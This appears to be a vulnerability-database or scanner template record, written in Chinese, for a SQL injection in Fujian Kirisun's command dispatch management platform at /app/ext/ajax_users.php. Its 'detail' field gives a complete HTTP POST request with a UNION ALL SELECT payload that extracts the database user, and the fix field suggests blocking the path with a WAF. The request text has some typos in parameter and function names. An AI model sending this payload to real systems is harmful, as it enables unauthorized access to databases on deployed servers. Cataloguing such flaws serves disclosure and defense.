vendor = "科立讯通信"
name = "福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/app/ext/ajax_users.php"
detail = "POST /app/ext/ajax users.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Content-Type: application/x-www-form-urlencodeddep leveI=1’) UNION ALL SELECT NULL,CONCAT(0x7e,user0,0x7e),NULL,NULL,NULL-- -"
fix = "WAF封禁路径，等待发布补丁"
date = "0722"
label = "未知"
